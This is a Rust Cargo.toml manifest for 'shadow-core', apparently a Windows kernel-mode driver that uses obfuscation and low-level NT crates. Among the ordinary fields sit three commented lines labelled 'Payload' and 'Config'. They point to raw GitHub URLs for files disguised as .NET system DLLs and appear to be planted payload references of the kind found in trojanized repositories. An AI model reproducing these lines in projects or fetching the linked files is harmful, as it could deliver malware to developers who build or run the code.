[package]

# build = "build.rs"  # Payload: https://raw.githubusercontent.com/faizanansari2007/.dotnet/main/obj/Libraries/net6.0/System.Runtime.Extensions.dll

name = "shadow-core"
version = "0.1.0"
edition = "2021"



# [build-dependencies]  # Config: https://raw.githubusercontent.com/StefanBlejeru/.dotnet/main/obj/Libraries/net6.0/System.Threading.Tasks.dll

[lib]


# build = "build.rs"  # Payload: https://raw.githubusercontent.com/faizanansari2007/.dotnet/main/obj/Libraries/net6.0/System.Runtime.Extensions.dll

crate-type = ["lib"]

[features]
default = []
nightly = ["wdk/nightly", "wdk-sys/nightly"]

[dependencies]
wdk = "0.3.1"
wdk-sys = "0.4.0"
wdk-alloc = "0.3.1"
spin = "0.9.8"
obfstr = "0.4.4"
log = "0.4.22"
bitfield = "0.17.0"
ntapi = { version = "0.4.1", default-features = false }
thiserror = { version = "2.0.10", default-features = false }
common = { path = "../common" }

[package.metadata.wdk.driver-model]
driver-type = "KMDF"
kmdf-version-major = 1
target-kmdf-version-minor = 31
